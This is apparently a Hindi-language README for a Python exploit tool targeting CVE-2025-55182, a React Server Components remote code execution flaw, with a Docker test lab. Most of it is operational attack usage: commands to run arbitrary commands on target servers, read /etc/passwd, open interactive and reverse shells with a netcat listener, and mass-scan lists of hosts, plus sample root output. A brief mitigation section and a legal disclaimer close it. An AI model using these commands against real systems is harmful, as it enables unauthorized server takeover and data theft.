CVE-2025-55182 (React Server Components RCE) के लिए Python-आधारित शोषण, इंटरैक्टिव शेल, रिवर्स शेल, बैच स्कैनिंग और अधिकृत सुरक्षा परीक्षण के लिए Docker-आधारित कमजोर वातावरण के साथ।
⚠️ कानूनी घोषणा: यह उपकरण केवल सुरक्षा अनुसंधान, अधिकृत पेनिट्रेशन परीक्षण और शैक्षिक उद्देश्यों के लिए है। बिना स्पष्ट अनुमति के इस उपकरण का लक्ष्य प्रणाली पर उपयोग करना अवैध और अनैतिक है।
CVE-2025-55182 React Server Components (RSC) में एक महत्वपूर्ण रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता है, जो अनप्रमाणित हमलावरों को सर्वर पर मनमाना कोड निष्पादित करने की अनुमति देता है, जो दुर्भावनापूर्ण जावास्क्रिप्ट डीसीरियलाइज़ेशन के माध्यम से होता है।
| गुण | मान |
|---|
| CVE ID | CVE-2025-55182 |
| CVSS स्कोर | 9.8 (गंभीर) |
| हमला वेक्टर | नेटवर्क |
| हमला जटिलता | निम्न |
| आवश्यक अनुमतियाँ | कोई नहीं |
| उपयोगकर्ता सहभागिता | कोई नहीं |
| प्रभाव | उच्च (गोपनीयता, अखंडता, उपलब्धता) |
| प्रभावित घटक | React Server Components (RSC) |
| प्रभावित संस्करण | React 18.x - 19.x (विशिष्ट बिल्ड संस्करण) |
| प्रकटीकरण तिथि | 3 दिसंबर 2025 |
| CVE उपनाम | React2Shell |
मूल कारण: React Server Components RSC पेलोड को संसाधित करते समय उपयोगकर्ता-प्रदत्त जावास्क्रिप्ट ऑब्जेक्ट्स को अनुचित रूप से डीरियलाइज़ करता है, जिससे हमलावर सर्वर पर निष्पादित होने वाले दुर्भावनापूर्ण कोड को इंजेक्ट कर सकता है।
हमला वेक्टर: HTTP अनुरोधों में दुर्भावनापूर्ण RSC पेलोड प्रभाव: बिना प्रमाणीकरण के रिमोट कोड निष्पादन, सर्वर अधिग्रहण, डेटा लीक
# रिपॉजिटरी क्लोन करें
git clone https://github.com/hujiaozhuzhu/gju.git
cd gju
# निर्भरताएँ स्थापित करें
pip install -r requirements.txt
# निर्भरताएँ स्थापित करें
pip install requests
# संवेदनशील लक्ष्य पर कमांड निष्पादित करें
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 -c "whoami"
# इंटरैक्टिव शेल मोड
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 --shell
# कस्टम कमांड
python exploit/cve_2025_55182.py -u http://target.com -c "cat /etc/passwd"
# कस्टम IP/पोर्ट के साथ रिवर्स शेल स्थापित करें
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444
# बल्क स्कैनिंग
python exploit/batch_scanner.py -f targets.txt
# वर्बोज़ मोड
python exploit/cve_2025_55182.py -u http://target.com -v
# कस्टम User-Agent
python exploit/cve_2025_55182.py -u http://target.com --ua "Mozilla/5.0"
cd target
docker-compose up -d
cd target
npm install
npm run dev
संवेदनशील एप्लिकेशन तक पहुँचें: http://localhost:3000
संवेदनशील सर्वर पर एकल कमांड निष्पादित करें:
python exploit/cve_2025_55182.py -u http://target.com -c "id"
अपेक्षित आउटपुट:
[+] भेद्यता का पता लगाया गया: React Server Components RCE
[+] कमांड निष्पादित: id
[+] प्रतिक्रिया:
uid=0(root) gid=0(root) groups=0(root)
संवेदनशील सर्वर पर इंटरैक्टिव शेल प्राप्त करें:
python exploit/cve_2025_55182.py -u http://target.com --shell
विशेषताएँ:
रिवर्स शेल कनेक्शन स्थापित करें:
# हमलावर मशीन पर
nc -lvnp 4444
# शोषण उपकरण चलाएँ
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444
एकाधिक लक्ष्यों पर भेद्यता स्कैन करें:
# लक्ष्य फ़ाइल बनाएँ
cat > targets.txt << EOF
http://192.168.1.10:3000
http://192.168.1.11:3000
http://192.168.1.12:3000
EOF
# बल्क स्कैनर चलाएँ
python exploit/batch_scanner.py -f targets.txt
React को अपग्रेड करें
npm install react@latest
# नवीनतम फिक्स संस्करण में अपग्रेड करें
RSC अनुरोधों को ब्लॉक करें
// अस्थायी रूप से RSC अक्षम करें
const config = {
enableRSC: false
}
WAF नियम
# संवेदनशील वातावरण सेट करें
cd target && docker-compose up -d
# भेद्यता का परीक्षण करें
python exploit/cve_2025_55182.py -u http://localhost:3000 -c "echo 'CVE-2025-55182 RCE confirmed'"
# परीक्षण सूट चलाएँ
python tests/test_exploit.py
यह उपकरण प्रदर्शित करता है:
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत है - विस्तृत जानकारी के लिए LICENSE फ़ाइल देखें।
महत्वपूर्ण: यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है।
इस उपकरण का उपयोग करके, आप सहमत हैं:
यदि आपको उत्पादन प्रणालियों में यह भेद्यता मिलती है:
विक्रेता को रिपोर्ट करें
CVE आवंटन
सुरक्षा समुदाय
याद रखें: सुरक्षा अनुसंधान हमेशा नैतिक और कानूनी होना चाहिए। अपने कौशल का उपयोग इंटरनेट को सुरक्षित बनाने के लिए करें! 🛡️